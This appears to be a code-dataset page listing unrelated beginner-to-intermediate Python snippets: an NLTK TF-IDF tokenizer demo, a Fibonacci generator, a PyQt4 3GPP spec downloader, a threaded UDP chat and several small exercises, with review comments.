frame.grid(row=1, column=0, sticky=N+E+W+S)
f1.tkraise()
medalists = select_all()
for i,row in enumerate(medalists):
rowID = int(i)
Label(f1, text=row[0],bg="#ffcc00", anchor="w").grid(row=rowID, column=0, padx=10, sticky=E+W)
Label(f1, text=row[1],bg="#ffcc00", anchor="w").grid(row=rowID, column=1, padx=10, sticky=E+W)
Label(f1, text=row[2],bg="#ffcc00", anchor="w").grid(row=rowID, column=2, padx=10, sticky=E+W)
Label(f1, text=row[3],bg="#ffcc00", anchor="w").grid(row=rowID, column=3, padx=10, sticky=E+W)
main()
"""
|
import string
import pandas as pd
import numpy as np
from nltk.corpus import stopwords
from nltk import wordpunct_tokenize
from nltk import WordNetLemmatizer
from nltk import sent_tokenize
from nltk import pos_tag
from sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer
from sklearn.naive_bayes import GaussianNB, MultinomialNB
from sklearn.metrics import accuracy_score
def tokenize(document):
    """Yield normalized, lemmatized word tokens from *document*.

    Splits the text into sentences, POS-tags the word tokens, lower-cases and
    strips each token, skips stopwords / pure punctuation / numbers, and
    yields the lemma of everything that remains.
    """
    lemmatizer = WordNetLemmatizer()
    # Build the stopword set once: the original called stopwords.words('english')
    # for every token, re-reading the corpus list and doing an O(n) membership
    # scan each time.
    stop_words = set(stopwords.words('english'))
    # Break the document into sentences
    for sent in sent_tokenize(document):
        # Break the sentence into part-of-speech tagged tokens
        for token, tag in pos_tag(wordpunct_tokenize(sent)):
            # Normalize: lower-case, trim whitespace and stray '_' / '*'.
            token = token.lower()
            token = token.strip()
            token = token.strip('_')
            token = token.strip('*')
            # If stopword, ignore.
            if token in stop_words:
                continue
            # If punctuation, ignore.
            if all(char in string.punctuation for char in token):
                continue
            # If number, ignore.
            if token.isdigit():
                continue
            # Lemmatize: collapse morphological variants (tense, plurality,
            # gender, ...) to a single base form, then yield it.
            lemma = lemmatizer.lemmatize(token)
            yield lemma
# Toy corpus: four labeled statements for training, two for testing.
train_data = pd.DataFrame({'label': ['x', 'x', 'y', 'y'],
                           'statement': ['This is a dog, damn!, dog',
                                         'This is a cat, damn!, dog',
                                         'This is a truck, wow!, dog, dog',
                                         'This is a car, wow!, dog, dog']})
test_data = pd.DataFrame({'label': ['x', 'y'],
                          'statement': ['This is a duck, damn!',
                                        'This is a aeroplane, wow!']})
X_train = train_data['statement']
y_train = train_data['label']
X_test = test_data['statement']
y_test = test_data['label']
# Use the custom tokenize() generator; lowercasing is already done there.
vectorizer = TfidfVectorizer(tokenizer=tokenize, preprocessor=None, lowercase=False)
# Fit the vocabulary on the training statements only, then transform both sets.
vectorizer.fit(X_train)
print(vectorizer.vocabulary_)
X_train_tfidf = vectorizer.transform(X_train)
X_test_tfidf = vectorizer.transform(X_test)
print(X_train_tfidf.shape)
print(X_test_tfidf.shape)
print(X_train_tfidf.toarray())
print(X_test_tfidf.toarray())
# gnb = GaussianNB()
# gnb.fit(X_train_tfidf.toarray(), y_train)
# Y_pred = gnb.predict(X_test_tfidf.toarray())
# print(str(round(accuracy_score(y_test, Y_pred), 2) * 100) + '%')
# labels = {'barely-true': 0, 'FALSE': 1, 'half-true': 2, 'mostly-true': 3, 'TRUE': 4, 'pants-fire': 5}
#
# YTR = []
# YTS = []
#
# for rec in Y_train.values:
# YTR.append(labels[rec])
#
# for rec in Y_test.values:
# YTS.append(labels[rec])
#
# print(YTR)
|
def generate_fibonacci():
    """Yield (index, value) pairs of the Fibonacci sequence 1, 1, 2, 3, 5, ...

    Indexing starts at 1, so the first pair is (1, 1).
    """
    index = 1
    previous, current = 0, 1
    yield (index, current)
    while True:
        # Tuple assignment advances the pair without the temporary `sum`
        # variable of the original, which shadowed the built-in sum().
        previous, current = current, previous + current
        index += 1
        yield (index, current)
def main():
    """Print the index and value of the first 1000-digit Fibonacci number."""
    pairs = generate_fibonacci()
    index, value = next(p for p in pairs if len(str(p[1])) == 1000)
    print('%d: %d' % (index, value))

if __name__ == '__main__':
    main()
#!/usr/local/bin/python
from unittest import TestCase
def answer_one():
    """Part-one placeholder: consumes the input file but computes nothing yet.

    Implicitly returns None until the puzzle logic is implemented.
    """
    with open('2020_07_input.txt', 'r') as f:
        for _line in f:
            pass  # TODO: implement part one
def answer_two():
    """Part-two placeholder: consumes the input file but computes nothing yet.

    Implicitly returns None until the puzzle logic is implemented.
    """
    with open('2020_07_input.txt', 'r') as f:
        for _line in f:
            pass  # TODO: implement part two
# Script entry point.
# NOTE(review): answer_one() has no return statement, so this prints 'None'.
if __name__ == '__main__':
    print(answer_one())
    # print(answer_two())
|
#coding:utf-8
from PyQt4.QtGui import *
from PyQt4.QtCore import *
import urllib,re,sys
doc_version=['11.9.0','11.8.0','11.7.0','11.6.0','11.5.0','11.4.0','11.3.0','11.2.0','11.1.0']
baseurl='http://www.3gpp.org/ftp/Specs/html-info/%s.htm'
class StandardDialog(QDialog):
    """PyQt4 dialog (Python 2): downloads 3GPP specification zips by doc id."""
    def __init__(self,parent=None):
        super(StandardDialog,self).__init__(parent)
        self.setWindowTitle("3GPP doc Downloader!")
        # One action button plus an input box (doc ids) and a read-only log box.
        DimMsgDecodeButton=QPushButton(self.tr("Dim Msg Decode"))
        self.label_SrcBuf = QLabel('3GPP DocID: 29273 29280 ...')
        self.fileTextEditInput=QTextEdit()
        self.fileTextEditOutput=QTextEdit()
        self.fileTextEditOutput.setReadOnly(1)
        layout=QGridLayout()
        #col 0
        layout.addWidget(self.label_SrcBuf, 0, 0)
        layout.addWidget(self.fileTextEditInput, 1, 0, 3, 1)
        layout.addWidget(self.fileTextEditOutput,4,0, 12, 1)
        #col 1
        layout.addWidget(DimMsgDecodeButton,2,1)
        self.setLayout(layout)
        # Old-style PyQt4 signal connection: button click triggers the download.
        self.connect(DimMsgDecodeButton,SIGNAL("clicked()"),self.DecodeDimMsgSlot)
    def getdoc(self,doc_no):
        """Fetch the spec index page for doc_no and download the newest zip
        whose version matches one of the preferred `doc_version` entries."""
        url=baseurl%(doc_no)
        log='preparing download from'+url
        self.fileTextEditOutput.append(log)
        # NOTE(review): the bare except below swallows all errors (including
        # NameError/UnboundLocalError when no version matches) — consider
        # narrowing it and logging the actual exception.
        try:
            webpage=urllib.urlopen(url).read()
            # Try the preferred versions in order; keep the first match.
            for ver in doc_version:
                doc_urls=re.findall('<a href=(.*?)>'+ver, webpage)
                if doc_urls:
                    doc_url=doc_urls[0]
                    break
            # Derive a local file name from the zip URL, else use the doc id.
            filename1=re.search('\d{5}-b\d{2}.zip',doc_url)
            if filename1:
                filename=filename1.group()
            else:
                filename=doc_no
            s=urllib.urlopen(doc_url)
            destfile=s.read()
            open(filename,'wb').write(destfile)
            log='download %s from %s success!!'%(filename, doc_url)
            self.fileTextEditOutput.append(log)
        except:
            log='open url ['+url+'] failure!'
            self.fileTextEditOutput.append(log)
    def DecodeDimMsgSlot(self):
        """Button handler: split the input box on spaces/commas and download
        every listed document id."""
        hexstr=str(self.fileTextEditInput.toPlainText()).strip()
        downloadlist=re.split('[ ,]',hexstr)
        print downloadlist
        for docid in downloadlist:
            self.getdoc(docid)
# Standard Qt application bootstrap (Python 2 / PyQt4).
if __name__ == '__main__':
    print 'starting!!!'
    app=QApplication(sys.argv)
    form=StandardDialog()
    form.show()
    app.exec_()
# -*- coding: utf-8 -*-
"""
Created on Thu May 16 12:52:29 2019
@author: walonsor
"""
import sys  # to access the command-line arguments via sys.argv
print("Hola, bienvenido a tu primer script")
# Show the parameters this script received, e.g.:
# ['1_HolaMundo.py', 'Una cadena de texto', '5']
print(sys.argv)
|
# Author: Azad
# Date: 4/5/18
# Desc: Write a program that takes a list of numbers
# (for example, a = [5, 10, 15, 20, 25])
# and makes a new list of only the first and last elements of the given list.
# For practice, write this code inside a function.
#________________________________________________________________________________________
a = [5, 10, 15, 20, 25]
def get_start_and_end(items):
    """Return a new list holding the first and last elements of *items*.

    The parameter was renamed from ``list`` so it no longer shadows the
    built-in, and ``items[-1]`` replaces the manual ``len() - 1`` indexing.
    """
    return [items[0], items[-1]]
print(get_start_and_end(a))
|
# -*- coding: cp949 -*-
# Compare printing each item in a loop vs. printing one join()-ed string.
import time
l = range(1000)
t = time.mktime(time.localtime())
for i in l:
    print(i,)
t1 = time.mktime(time.localtime()) - t
t = time.mktime(time.localtime())
print(", ".join(str(i) for i in l))
t2 = time.mktime(time.localtime()) - t
# NOTE(review): time.mktime(time.localtime()) has one-second resolution;
# time.perf_counter() would measure these short runs far more accurately.
print("for 문으로 각 인자를 출력")
print("Take {0} seconds".format(t1))
print("join() 메서드로 출력")
print("Take {0} seconds".format(t2))
|
from socket import*
from threading import Thread
def main():
    """Run a simple UDP chat: one thread receives datagrams, one sends input.

    Prompts for the peer's ip/port, binds a local UDP socket, then runs the
    accept() and send() loops on separate threads until interrupted.
    """
    global udp_socket
    global dest_ip
    global dest_port
    dest_ip = input("ip:")
    dest_port = int(input("port:"))
    udp_socket = socket(AF_INET, SOCK_DGRAM)
    # NOTE(review): the bind address is hard-coded and must match a local interface.
    bind_addr = ('10.123.164.100', 8000)
    udp_socket.bind(bind_addr)
    recieve = Thread(target=accept)
    send_msg = Thread(target=send)
    recieve.start()
    # Bug fix: the original called send_msg.run(), which executes send() in the
    # *current* thread (blocking main forever) instead of starting the worker.
    send_msg.start()
    recieve.join()
    send_msg.join()
    udp_socket.close()
def accept():
    """Receive loop: print each incoming datagram after stripping the
    str(bytes) repr wrapper via format_str()."""
    while True:
        accept_data, dest_addr = udp_socket.recvfrom(1024)
        print(format_str(str(accept_data)))
def send():
    """Send loop: read a line from stdin and send it to the peer as UTF-8."""
    while True:
        send_data = input("<<")
        dest_addr = (dest_ip, dest_port)
        udp_socket.sendto(send_data.encode(encoding='utf-8'), dest_addr)
def format_str(string):
    """Strip the ``b'...'`` repr wrapper produced by str(bytes_payload).

    Bug fix: the original used re.findall(r'[^b]', ...) plus slicing, which
    deleted EVERY letter 'b' from the text (corrupting any message containing
    one) instead of removing just the repr prefix and surrounding quotes.
    Input that is not a bytes repr is returned unchanged.
    """
    if string.startswith("b'") and string.endswith("'"):
        return string[2:-1]
    if string.startswith('b"') and string.endswith('"'):
        return string[2:-1]
    return string
# Script entry point: start the UDP chat.
if __name__ == '__main__':
    main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.